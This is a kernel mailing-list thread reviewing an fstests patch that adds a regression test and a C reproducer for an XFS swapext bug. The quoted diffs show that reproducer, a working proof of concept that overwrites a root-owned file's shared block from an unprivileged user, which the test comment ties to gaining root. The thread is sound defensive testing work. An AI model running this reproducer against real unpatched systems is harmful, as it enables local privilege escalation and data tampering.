> tests/xfs/1939 | 69 ++++++++++++++
> tests/xfs/1939.out | 2
> 4 files changed, 302 insertions(+), 1 deletion(-)
> create mode 100644 src/xfs-swapext-reflink.c
> create mode 100755 tests/xfs/1939
> create mode 100644 tests/xfs/1939.out
>
> diff --git a/src/Makefile b/src/Makefile
> index 211b16a832ad5d..eaf0621fc4b876 100644
> --- a/src/Makefile
> +++ b/src/Makefile
> @@ -37,7 +37,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
> detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
> uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
> rw_hint btrfs_ioctl refluxfs xfs-exchange-to-eof \
> - xfs-exchange-to-dirty-eof
> + xfs-exchange-to-dirty-eof xfs-swapext-reflink
>
> EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
> btrfs_crc32c_forged_name.py popdir.pl popattr.py \
> diff --git a/src/xfs-swapext-reflink.c b/src/xfs-swapext-reflink.c
> new file mode 100644
> index 00000000000000..e2a240d5a0af91
> --- /dev/null
> +++ b/src/xfs-swapext-reflink.c
> @@ -0,0 +1,230 @@
> +// SPDX-License-Identifier: GPL-2.0
> +
> +// Trick swapext into screwing up the file reflink flags after data exchange
> +#include <stdio.h>
> +#include <stdlib.h>
> +#include <string.h>
> +#include <unistd.h>
> +#include <fcntl.h>
> +#include <sys/ioctl.h>
> +#include <sys/stat.h>
> +#include <sys/vfs.h>
> +#include <linux/fs.h>
> +#include <linux/fiemap.h>
> +
> +#ifndef FICLONERANGE
> +#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
> +#endif
> +
> +#ifndef XFS_EXCHANGE_RANGE_TO_EOF
> +struct xfs_exchange_range {
> + __s32 file1_fd;
> + __u32 pad;
> + __u64 file1_offset;
> + __u64 file2_offset;
> + __u64 length;
> + __u64 flags;
> +};
> +#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
> +#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
> +#endif
> +
> +#ifndef XFS_IOC_SWAPEXT
> +typedef struct xfs_bstime {
> + long tv_sec;
> + __s32 tv_nsec;
> +} xfs_bstime_t;
> +
> +struct xfs_bstat {
> + __u64 bs_ino;
> + __u16 bs_mode;
> + __u16 bs_nlink;
> + __u32 bs_uid;
> + __u32 bs_gid;
> + __u32 bs_rdev;
> + __s32 bs_blksize;
> + __s64 bs_size;
> + xfs_bstime_t bs_atime;
> + xfs_bstime_t bs_mtime;
> + xfs_bstime_t bs_ctime;
> + __s64 bs_blocks;
> + __u32 bs_xflags;
> + __s32 bs_extsize;
> + __s32 bs_extents;
> + __u32 bs_gen;
> + __u16 bs_projid_lo;
> + __u16 bs_forkoff;
> + __u16 bs_projid_hi;
> + __u16 bs_sick;
> + __u16 bs_checked;
> + unsigned char bs_pad[2];
> + __u32 bs_cowextsize;
> + __u32 bs_dmevmask;
> + __u16 bs_dmstate;
> + __u16 bs_aextents;
> +};
> +
> +struct xfs_swapext {
> + __s64 sx_version;
> +#define XFS_SX_VERSION 0
> + __s64 sx_fdtarget;
> + __s64 sx_fdtmp;
> + __s64 sx_offset;
> + __s64 sx_length;
> + char sx_pad[16];
> + struct xfs_bstat sx_stat;
> +};
> +#define XFS_IOC_SWAPEXT _IOWR('X', 109, struct xfs_swapext)
> +#endif
> +
> +static unsigned long blksz;
> +static int peer, f1;
> +
> +static unsigned long long phys(int fd, unsigned long long off)
> +{
> + struct { struct fiemap f; struct fiemap_extent e[1]; } q;
> +
> + memset(&q, 0, sizeof q);
> + q.f.fm_start = off;
> + q.f.fm_length = blksz;
> + q.f.fm_extent_count = 1;
> + if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
> + return 0;
> + return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
> +}
> +
> +static void show(const char *tag)
> +{
> + struct stat st;
> + int i;
> +
> + fstat(f1, &st);
> + printf("%-26s peer [%llu] file1 size %5lld [", tag, phys(peer, 0),
> + (long long)st.st_size);
> + for (i = 0; i < 3; i++)
> + printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
> + i == 2 ? "]\n" : "] [");
> +}
> +
> +static int mkfile(const char *name, char fill, int blocks)
> +{
> + char *buf;
> + int fd;
> +
> + unlink(name);
> + fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
> + if (fd < 0)
> + return fprintf(stderr, "open %s: %m\n", name), -1;
> + buf = malloc(blocks * blksz);
> + memset(buf, fill, blocks * blksz);
> + if (pwrite(fd, buf, blocks * blksz, 0) != (ssize_t)(blocks * blksz))
> + return fprintf(stderr, "pwrite %s: %m\n", name), -1;
> + free(buf);
> + fsync(fd);
> + return fd;
> +}
> +
> +int main(int argc, char *argv[])
> +{
> + struct xfs_exchange_range xr;
> + struct file_clone_range cr;
> + struct xfs_swapext sx;
> + char before[65536], after[65536], *buf;
> + struct statfs sfs;
> + struct stat st;
> + int d1, d2;
> +
> + if (argc != 3) {
> + fprintf(stderr, "Usage: $0 dir path_to_peer\n");
> + return 2;
> + }
> +
> + if (chdir(argv[1]))
> + return perror(argv[1]), 2;
> +
> + if (statfs(".", &sfs))
> + return fprintf(stderr, "statfs: %m\n"), 2;
> + blksz = sfs.f_bsize;
> +
> + peer = open(argv[2], O_RDONLY);
> + if (peer < 0)
> + return fprintf(stderr, "open peer: %m\n"), 2;
> + fstat(peer, &st);
> + printf("peer uid %u mode %04o size %lld, block size %lu\n\n",
> + st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
> + if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
> + return fprintf(stderr, "read peer: %m\n"), 2;
> + syncfs(peer); /* so FIEMAP reports peer's real block */
> +
> + f1 = mkfile("file1", 'A', 3);
> + d1 = mkfile("donor1", 'B', 1);
> + d2 = mkfile("donor2", 'C', 1);
> + if (f1 < 0 || d1 < 0 || d2 < 0)
> + return 2;
> + show("start");
> +
> + /* 1. share peer's block into the middle of file1 */
> + cr = (struct file_clone_range){ .src_fd = peer, .src_offset = 0,
> + .src_length = blksz,
> + .dest_offset = blksz };
> + if (ioctl(f1, FICLONERANGE, &cr))
> + return fprintf(stderr, "FICLONERANGE: %m\n"), 2;
> + show("1 FICLONERANGE");
> +
> + /*
> + * 2. exchange file1's last block against the whole of donor1 with
> + * TO_EOF. The sizes are exchanged too, so file1 claims one block
> + * while still owning three. file2_offset is block 2, so this exchange
> + * cannot clear a reflink flag.
> + */
> + xr = (struct xfs_exchange_range){ .file1_fd = d1, .file1_offset = 0,
> + .file2_offset = 2 * blksz,
> + .length = 0,
> + .flags = XFS_EXCHANGE_RANGE_TO_EOF };
> + if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
> + return fprintf(stderr, "EXCHANGE_RANGE TO_EOF: %m\n"), 2;
> + show("2 EXCHANGE_RANGE TO_EOF");
> +
> + /*
> + * 3. XFS_IOC_SWAPEXT with file1 as the target. sx_offset is 0 and
> + * sx_length equals both inodes' i_disk_size, so the "Verify all data
> + * are being swapped" test passes. xfs_swap_extent_rmap() then bounds
> + * its remap loop with XFS_B_TO_FSB(mp, i_size_read(VFS_I(ip))), which
> + * is one block, so file1's two mappings above its size are left in
> + * place -- and the reflink flags are swapped anyway, clearing file1's.
> + */
> + fsync(f1);
> + fsync(d2);
> + if (fstat(f1, &st))
> + return fprintf(stderr, "fstat file1: %m\n"), 2;
> + memset(&sx, 0, sizeof sx);
> + sx.sx_version = XFS_SX_VERSION;
> + sx.sx_fdtarget = f1;
> + sx.sx_fdtmp = d2;
> + sx.sx_offset = 0;
> + sx.sx_length = st.st_size;
> + sx.sx_stat.bs_mtime.tv_sec = st.st_mtim.tv_sec;
> + sx.sx_stat.bs_mtime.tv_nsec = st.st_mtim.tv_nsec;
> + sx.sx_stat.bs_ctime.tv_sec = st.st_ctim.tv_sec;
> + sx.sx_stat.bs_ctime.tv_nsec = st.st_ctim.tv_nsec;
> + if (ioctl(f1, XFS_IOC_SWAPEXT, &sx))
> + return fprintf(stderr, "SWAPEXT: %m\n"), 2;
> + show("3 SWAPEXT");
> +
> + /* 4. write to the block file1 still shares with peer */
> + buf = malloc(blksz);
> + memset(buf, 'X', blksz);
> + if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
> + return fprintf(stderr, "pwrite: %m\n"), 2;
> + fsync(f1);
> + show("4 pwrite(file1, 4096)");
> +
> + posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
> + if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
> + return fprintf(stderr, "re-read peer: %m\n"), 2;
> + printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
> + memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
> + return memcmp(before, after, blksz) ? 0 : 1;
> +}
> +
> +
> diff --git a/tests/xfs/1939 b/tests/xfs/1939
> new file mode 100755
> index 00000000000000..b08ea09e977628
> --- /dev/null
> +++ b/tests/xfs/1939
> @@ -0,0 +1,69 @@
> +#! /bin/bash
> +# SPDX-License-Identifier: GPL-2.0
> +# Copyright (c) 2026 Oracle. All Rights Reserved.
> +#
> +# FS QA Test No. 1939
> +#
> +# Regression test for an swapext bug which unintentionally results in files
> +# that share data blocks but don't have the reflink flag set. This enables
> +# attackers to rewrite shared blocks to gain root privileges, similar to
> +# refluxfs.
> +. ./common/preamble
> +_begin_fstest auto quick swapext
> +
> +. ./common/filter
> +. ./common/reflink
> +
> +_require_test_program "xfs-swapext-reflink"
> +_require_user fsgqa
> +_require_group fsgqa
> +_require_scratch_reflink
> +_require_xfs_scratch_rmapbt
> +_require_cp_reflink
> +
> +_fixed_by_fs_commit xfs XXXXXXXXXXXXXX \
> + "xfs: stop exchanging reflink flags when exchanging mappings"
> +
> +_scratch_mkfs >> $seqres.full
> +_scratch_mount
> +
> +rootdir=$SCRATCH_MNT/root
> +userdir1=$SCRATCH_MNT/user1
> +blksz=$(_get_file_block_size $SCRATCH_MNT)
> +
> +# Fill $mnt/peer with "P", run reproducer program
> +mkdir -p $rootdir $userdir1
> +$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer.copy >> $seqres.full
> +$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer1 >> $seqres.full
> +sync
> +
> +chown $qa_user:$qa_group $userdir1
> +chmod +r $rootdir/peer1
> +
> +_su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1" &> $tmp.out1
> +
> +echo "Errors from reproducer:" >> $seqres.full
> +cat $tmp.out1 >> $seqres.full
> +
> +# Check for file corruption
> +grep -q REWRITTEN $tmp.out1 && \
> + echo "$rootdir/peer1 rewritten, filesystem corrupt!"
> +
> +cmp -s $rootdir/peer.copy $rootdir/peer1 || \
> + echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
> +
> +# Check reflink flags
> +_scratch_unmount
> +_scratch_xfs_db \
> + -c "path /user1/file1" -c 'print' \
> + | grep v3.reflink
> +_scratch_mount
> +
> +# Check for file corruption now that we've blown away all caches
> +grep -q REWRITTEN $tmp.out1 && \
> + echo "$rootdir/peer1 rewritten, filesystem corrupt!"
> +
> +cmp -s $rootdir/peer.copy $rootdir/peer1 || \
> + echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
> +
> +_exit 0
> diff --git a/tests/xfs/1939.out b/tests/xfs/1939.out
> new file mode 100644
> index 00000000000000..ad52293f986ac6
> --- /dev/null
> +++ b/tests/xfs/1939.out
> @@ -0,0 +1,2 @@
> +QA output created by 1939
> +v3.reflink = 1
>
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: [PATCH] xfs: add regression test for swapext reflux
2026-10-09 16:13 ` Eric Sandeen
@ 2026-10-09 22:11 ` Darrick J. Wong
2026-10-10 6:09 ` Eric Sandeen
0 siblings, 1 reply; 8+ messages in thread
From: Darrick J. Wong @ 2026-10-09 22:11 UTC (permalink / raw)
To: Eric Sandeen
Cc: Zorro Lang, Carlos Maiolino, Norbert Szetei, linux-xfs,
Christoph Hellwig
On Fri, Oct 09, 2026 at 11:13:53AM -0500, Eric Sandeen wrote:
> On 10/7/26 12:05 PM, Darrick J. Wong wrote:
> > From: Darrick J. Wong <djwong@kernel.org>
> >
> > This is a regression test for a bug that Norbert Szetei reported in the
> > XFS swapext ioctl. I've ported his reproducer program to fstests so
> > that everyone can run it.
>
> A couple things I notice -
>
> 1) this still requires EXCHRANGE?
> 2) if the EXCHRANGE ioctl fails with EOPNOTSUPP the test passes silently
Huh? Oh, the reproducer actually requires it. Ok, I'll add a _require
clause here.
> 3) su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1"
> requires $qa_user to be able to traverse to $here/src/xfs-swapext-reflink and if
> it can't, the test fails oddly
>
> For 3) I think just dropping the $here might fix it?
>
> su $qa_user -c "./src/xfs-swapext-reflink $userdir1 $rootdir/peer1"
Yeah. From commit b7cecbea22ba6d ("fstests: Add path $here before
src/<file>"):
[Eryu: some tests run src/<file> as regular user, don't add $here
prefix in such case, as a regular user may have no search permission
on $here]
<grumble> Will fix.
--D
> -Eric
>
> > Cc: Norbert Szetei <norbert@doyensec.com>
> > Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
> > ---
> > src/Makefile | 2
> > src/xfs-swapext-reflink.c | 230 +++++++++++++++++++++++++++++++++++++++++++++
> > tests/xfs/1939 | 69 ++++++++++++++
> > tests/xfs/1939.out | 2
> > 4 files changed, 302 insertions(+), 1 deletion(-)
> > create mode 100644 src/xfs-swapext-reflink.c
> > create mode 100755 tests/xfs/1939
> > create mode 100644 tests/xfs/1939.out
> >
> > diff --git a/src/Makefile b/src/Makefile
> > index 211b16a832ad5d..eaf0621fc4b876 100644
> > --- a/src/Makefile
> > +++ b/src/Makefile
> > @@ -37,7 +37,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
> > detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
> > uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
> > rw_hint btrfs_ioctl refluxfs xfs-exchange-to-eof \
> > - xfs-exchange-to-dirty-eof
> > + xfs-exchange-to-dirty-eof xfs-swapext-reflink
> >
> > EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
> > btrfs_crc32c_forged_name.py popdir.pl popattr.py \
> > diff --git a/src/xfs-swapext-reflink.c b/src/xfs-swapext-reflink.c
> > new file mode 100644
> > index 00000000000000..e2a240d5a0af91
> > --- /dev/null
> > +++ b/src/xfs-swapext-reflink.c
> > @@ -0,0 +1,230 @@
> > +// SPDX-License-Identifier: GPL-2.0
> > +
> > +// Trick swapext into screwing up the file reflink flags after data exchange
> > +#include <stdio.h>
> > +#include <stdlib.h>
> > +#include <string.h>
> > +#include <unistd.h>
> > +#include <fcntl.h>
> > +#include <sys/ioctl.h>
> > +#include <sys/stat.h>
> > +#include <sys/vfs.h>
> > +#include <linux/fs.h>
> > +#include <linux/fiemap.h>
> > +
> > +#ifndef FICLONERANGE
> > +#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
> > +#endif
> > +
> > +#ifndef XFS_EXCHANGE_RANGE_TO_EOF
> > +struct xfs_exchange_range {
> > + __s32 file1_fd;
> > + __u32 pad;
> > + __u64 file1_offset;
> > + __u64 file2_offset;
> > + __u64 length;
> > + __u64 flags;
> > +};
> > +#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
> > +#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
> > +#endif
> > +
> > +#ifndef XFS_IOC_SWAPEXT
> > +typedef struct xfs_bstime {
> > + long tv_sec;
> > + __s32 tv_nsec;
> > +} xfs_bstime_t;
> > +
> > +struct xfs_bstat {
> > + __u64 bs_ino;
> > + __u16 bs_mode;
> > + __u16 bs_nlink;
> > + __u32 bs_uid;
> > + __u32 bs_gid;
> > + __u32 bs_rdev;
> > + __s32 bs_blksize;
> > + __s64 bs_size;
> > + xfs_bstime_t bs_atime;
> > + xfs_bstime_t bs_mtime;
> > + xfs_bstime_t bs_ctime;
> > + __s64 bs_blocks;
> > + __u32 bs_xflags;
> > + __s32 bs_extsize;
> > + __s32 bs_extents;
> > + __u32 bs_gen;
> > + __u16 bs_projid_lo;
> > + __u16 bs_forkoff;
> > + __u16 bs_projid_hi;
> > + __u16 bs_sick;
> > + __u16 bs_checked;
> > + unsigned char bs_pad[2];
> > + __u32 bs_cowextsize;
> > + __u32 bs_dmevmask;
> > + __u16 bs_dmstate;
> > + __u16 bs_aextents;
> > +};
> > +
> > +struct xfs_swapext {
> > + __s64 sx_version;
> > +#define XFS_SX_VERSION 0
> > + __s64 sx_fdtarget;
> > + __s64 sx_fdtmp;
> > + __s64 sx_offset;
> > + __s64 sx_length;
> > + char sx_pad[16];
> > + struct xfs_bstat sx_stat;
> > +};
> > +#define XFS_IOC_SWAPEXT _IOWR('X', 109, struct xfs_swapext)
> > +#endif
> > +
> > +static unsigned long blksz;
> > +static int peer, f1;
> > +
> > +static unsigned long long phys(int fd, unsigned long long off)
> > +{
> > + struct { struct fiemap f; struct fiemap_extent e[1]; } q;
> > +
> > + memset(&q, 0, sizeof q);
> > + q.f.fm_start = off;
> > + q.f.fm_length = blksz;
> > + q.f.fm_extent_count = 1;
> > + if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
> > + return 0;
> > + return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
> > +}
> > +
> > +static void show(const char *tag)
> > +{
> > + struct stat st;
> > + int i;
> > +
> > + fstat(f1, &st);
> > + printf("%-26s peer [%llu] file1 size %5lld [", tag, phys(peer, 0),
> > + (long long)st.st_size);
> > + for (i = 0; i < 3; i++)
> > + printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
> > + i == 2 ? "]\n" : "] [");
> > +}
> > +
> > +static int mkfile(const char *name, char fill, int blocks)
> > +{
> > + char *buf;
> > + int fd;
> > +
> > + unlink(name);
> > + fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
> > + if (fd < 0)
> > + return fprintf(stderr, "open %s: %m\n", name), -1;
> > + buf = malloc(blocks * blksz);
> > + memset(buf, fill, blocks * blksz);
> > + if (pwrite(fd, buf, blocks * blksz, 0) != (ssize_t)(blocks * blksz))
> > + return fprintf(stderr, "pwrite %s: %m\n", name), -1;
> > + free(buf);
> > + fsync(fd);
> > + return fd;
> > +}
> > +
> > +int main(int argc, char *argv[])
> > +{
> > + struct xfs_exchange_range xr;
> > + struct file_clone_range cr;
> > + struct xfs_swapext sx;
> > + char before[65536], after[65536], *buf;
> > + struct statfs sfs;
> > + struct stat st;
> > + int d1, d2;
> > +
> > + if (argc != 3) {
> > + fprintf(stderr, "Usage: $0 dir path_to_peer\n");
> > + return 2;
> > + }
> > +
> > + if (chdir(argv[1]))
> > + return perror(argv[1]), 2;
> > +
> > + if (statfs(".", &sfs))
> > + return fprintf(stderr, "statfs: %m\n"), 2;
> > + blksz = sfs.f_bsize;
> > +
> > + peer = open(argv[2], O_RDONLY);
> > + if (peer < 0)
> > + return fprintf(stderr, "open peer: %m\n"), 2;
> > + fstat(peer, &st);
> > + printf("peer uid %u mode %04o size %lld, block size %lu\n\n",
> > + st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
> > + if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
> > + return fprintf(stderr, "read peer: %m\n"), 2;
> > + syncfs(peer); /* so FIEMAP reports peer's real block */
> > +
> > + f1 = mkfile("file1", 'A', 3);
> > + d1 = mkfile("donor1", 'B', 1);
> > + d2 = mkfile("donor2", 'C', 1);
> > + if (f1 < 0 || d1 < 0 || d2 < 0)
> > + return 2;
> > + show("start");
> > +
> > + /* 1. share peer's block into the middle of file1 */
> > + cr = (struct file_clone_range){ .src_fd = peer, .src_offset = 0,
> > + .src_length = blksz,
> > + .dest_offset = blksz };
> > + if (ioctl(f1, FICLONERANGE, &cr))
> > + return fprintf(stderr, "FICLONERANGE: %m\n"), 2;
> > + show("1 FICLONERANGE");
> > +
> > + /*
> > + * 2. exchange file1's last block against the whole of donor1 with
> > + * TO_EOF. The sizes are exchanged too, so file1 claims one block
> > + * while still owning three. file2_offset is block 2, so this exchange
> > + * cannot clear a reflink flag.
> > + */
> > + xr = (struct xfs_exchange_range){ .file1_fd = d1, .file1_offset = 0,
> > + .file2_offset = 2 * blksz,
> > + .length = 0,
> > + .flags = XFS_EXCHANGE_RANGE_TO_EOF };
> > + if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
> > + return fprintf(stderr, "EXCHANGE_RANGE TO_EOF: %m\n"), 2;
> > + show("2 EXCHANGE_RANGE TO_EOF");
> > +
> > + /*
> > + * 3. XFS_IOC_SWAPEXT with file1 as the target. sx_offset is 0 and
> > + * sx_length equals both inodes' i_disk_size, so the "Verify all data
> > + * are being swapped" test passes. xfs_swap_extent_rmap() then bounds
> > + * its remap loop with XFS_B_TO_FSB(mp, i_size_read(VFS_I(ip))), which
> > + * is one block, so file1's two mappings above its size are left in
> > + * place -- and the reflink flags are swapped anyway, clearing file1's.
> > + */
> > + fsync(f1);
> > + fsync(d2);
> > + if (fstat(f1, &st))
> > + return fprintf(stderr, "fstat file1: %m\n"), 2;
> > + memset(&sx, 0, sizeof sx);
> > + sx.sx_version = XFS_SX_VERSION;
> > + sx.sx_fdtarget = f1;
> > + sx.sx_fdtmp = d2;
> > + sx.sx_offset = 0;
> > + sx.sx_length = st.st_size;
> > + sx.sx_stat.bs_mtime.tv_sec = st.st_mtim.tv_sec;
> > + sx.sx_stat.bs_mtime.tv_nsec = st.st_mtim.tv_nsec;
> > + sx.sx_stat.bs_ctime.tv_sec = st.st_ctim.tv_sec;
> > + sx.sx_stat.bs_ctime.tv_nsec = st.st_ctim.tv_nsec;
> > + if (ioctl(f1, XFS_IOC_SWAPEXT, &sx))
> > + return fprintf(stderr, "SWAPEXT: %m\n"), 2;
> > + show("3 SWAPEXT");
> > +
> > + /* 4. write to the block file1 still shares with peer */
> > + buf = malloc(blksz);
> > + memset(buf, 'X', blksz);
> > + if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
> > + return fprintf(stderr, "pwrite: %m\n"), 2;
> > + fsync(f1);
> > + show("4 pwrite(file1, 4096)");
> > +
> > + posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
> > + if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
> > + return fprintf(stderr, "re-read peer: %m\n"), 2;
> > + printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
> > + memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
> > + return memcmp(before, after, blksz) ? 0 : 1;
> > +}
> > +
> > +
> > diff --git a/tests/xfs/1939 b/tests/xfs/1939
> > new file mode 100755
> > index 00000000000000..b08ea09e977628
> > --- /dev/null
> > +++ b/tests/xfs/1939
> > @@ -0,0 +1,69 @@
> > +#! /bin/bash
> > +# SPDX-License-Identifier: GPL-2.0
> > +# Copyright (c) 2026 Oracle. All Rights Reserved.
> > +#
> > +# FS QA Test No. 1939
> > +#
> > +# Regression test for an swapext bug which unintentionally results in files
> > +# that share data blocks but don't have the reflink flag set. This enables
> > +# attackers to rewrite shared blocks to gain root privileges, similar to
> > +# refluxfs.
> > +. ./common/preamble
> > +_begin_fstest auto quick swapext
> > +
> > +. ./common/filter
> > +. ./common/reflink
> > +
> > +_require_test_program "xfs-swapext-reflink"
> > +_require_user fsgqa
> > +_require_group fsgqa
> > +_require_scratch_reflink
> > +_require_xfs_scratch_rmapbt
> > +_require_cp_reflink
> > +
> > +_fixed_by_fs_commit xfs XXXXXXXXXXXXXX \
> > + "xfs: stop exchanging reflink flags when exchanging mappings"
> > +
> > +_scratch_mkfs >> $seqres.full
> > +_scratch_mount
> > +
> > +rootdir=$SCRATCH_MNT/root
> > +userdir1=$SCRATCH_MNT/user1
> > +blksz=$(_get_file_block_size $SCRATCH_MNT)
> > +
> > +# Fill $mnt/peer with "P", run reproducer program
> > +mkdir -p $rootdir $userdir1
> > +$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer.copy >> $seqres.full
> > +$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer1 >> $seqres.full
> > +sync
> > +
> > +chown $qa_user:$qa_group $userdir1
> > +chmod +r $rootdir/peer1
> > +
> > +_su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1" &> $tmp.out1
> > +
> > +echo "Errors from reproducer:" >> $seqres.full
> > +cat $tmp.out1 >> $seqres.full
> > +
> > +# Check for file corruption
> > +grep -q REWRITTEN $tmp.out1 && \
> > + echo "$rootdir/peer1 rewritten, filesystem corrupt!"
> > +
> > +cmp -s $rootdir/peer.copy $rootdir/peer1 || \
> > + echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
> > +
> > +# Check reflink flags
> > +_scratch_unmount
> > +_scratch_xfs_db \
> > + -c "path /user1/file1" -c 'print' \
> > + | grep v3.reflink
> > +_scratch_mount
> > +
> > +# Check for file corruption now that we've blown away all caches
> > +grep -q REWRITTEN $tmp.out1 && \
> > + echo "$rootdir/peer1 rewritten, filesystem corrupt!"
> > +
> > +cmp -s $rootdir/peer.copy $rootdir/peer1 || \
> > + echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
> > +
> > +_exit 0
> > diff --git a/tests/xfs/1939.out b/tests/xfs/1939.out
> > new file mode 100644
> > index 00000000000000..ad52293f986ac6
> > --- /dev/null
> > +++ b/tests/xfs/1939.out
> > @@ -0,0 +1,2 @@
> > +QA output created by 1939
> > +v3.reflink = 1
> >
>
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: [PATCH] xfs: add regression test for swapext reflux
2026-10-09 22:11 ` Darrick J. Wong
@ 2026-10-10 6:09 ` Eric Sandeen
0 siblings, 0 replies; 8+ messages in thread
From: Eric Sandeen @ 2026-10-10 6:09 UTC (permalink / raw)
To: Darrick J. Wong
Cc: Lang Zorro, Carlos Maiolino, Norbert Szetei, linux-xfs,
Christoph Hellwig
> On Oct 9, 2026, at 17:11, Darrick J. Wong <djwong@kernel.org> wrote:
>
> On Fri, Oct 09, 2026 at 11:13:53AM -0500, Eric Sandeen wrote:
>>> On 10/7/26 12:05 PM, Darrick J. Wong wrote:
>>> From: Darrick J. Wong <djwong@kernel.org>
>>>
>>> This is a regression test for a bug that Norbert Szetei reported in the
>>> XFS swapext ioctl. I've ported his reproducer program to fstests so
>>> that everyone can run it.
>>
>> A couple things I notice -
>>
>> 1) this still requires EXCHRANGE?
>> 2) if the EXCHRANGE ioctl fails with EOPNOTSUPP the test passes silently
>
> Huh? Oh, the reproducer actually requires it. Ok, I'll add a _require
> clause here.
Should it test that exchrange is fully available and mkfs scratch with that option if so?
>> 3) su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1"
>> requires $qa_user to be able to traverse to $here/src/xfs-swapext-reflink and if
>> it can't, the test fails oddly
>>
>> For 3) I think just dropping the $here might fix it?
>>
>> su $qa_user -c "./src/xfs-swapext-reflink $userdir1 $rootdir/peer1"
>
> Yeah. From commit b7cecbea22ba6d ("fstests: Add path $here before
> src/<file>"):
>
> [Eryu: some tests run src/<file> as regular user, don't add $here
> prefix in such case, as a regular user may have no search permission
> on $here]
>
> <grumble> Will fix.
>
> --D
>
>> -Eric
>>
>>> Cc: Norbert Szetei <norbert@doyensec.com>
>>> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
>>> ---
>>> src/Makefile | 2
>>> src/xfs-swapext-reflink.c | 230 +++++++++++++++++++++++++++++++++++++++++++++
>>> tests/xfs/1939 | 69 ++++++++++++++
>>> tests/xfs/1939.out | 2
>>> 4 files changed, 302 insertions(+), 1 deletion(-)
>>> create mode 100644 src/xfs-swapext-reflink.c
>>> create mode 100755 tests/xfs/1939
>>> create mode 100644 tests/xfs/1939.out
>>>
>>> diff --git a/src/Makefile b/src/Makefile
>>> index 211b16a832ad5d..eaf0621fc4b876 100644
>>> --- a/src/Makefile
>>> +++ b/src/Makefile
>>> @@ -37,7 +37,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
>>> detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
>>> uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
>>> rw_hint btrfs_ioctl refluxfs xfs-exchange-to-eof \
>>> - xfs-exchange-to-dirty-eof
>>> + xfs-exchange-to-dirty-eof xfs-swapext-reflink
>>>
>>> EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
>>> btrfs_crc32c_forged_name.py popdir.pl popattr.py \
>>> diff --git a/src/xfs-swapext-reflink.c b/src/xfs-swapext-reflink.c
>>> new file mode 100644
>>> index 00000000000000..e2a240d5a0af91
>>> --- /dev/null
>>> +++ b/src/xfs-swapext-reflink.c
>>> @@ -0,0 +1,230 @@
>>> +// SPDX-License-Identifier: GPL-2.0
>>> +
>>> +// Trick swapext into screwing up the file reflink flags after data exchange
>>> +#include <stdio.h>
>>> +#include <stdlib.h>
>>> +#include <string.h>
>>> +#include <unistd.h>
>>> +#include <fcntl.h>
>>> +#include <sys/ioctl.h>
>>> +#include <sys/stat.h>
>>> +#include <sys/vfs.h>
>>> +#include <linux/fs.h>
>>> +#include <linux/fiemap.h>
>>> +
>>> +#ifndef FICLONERANGE
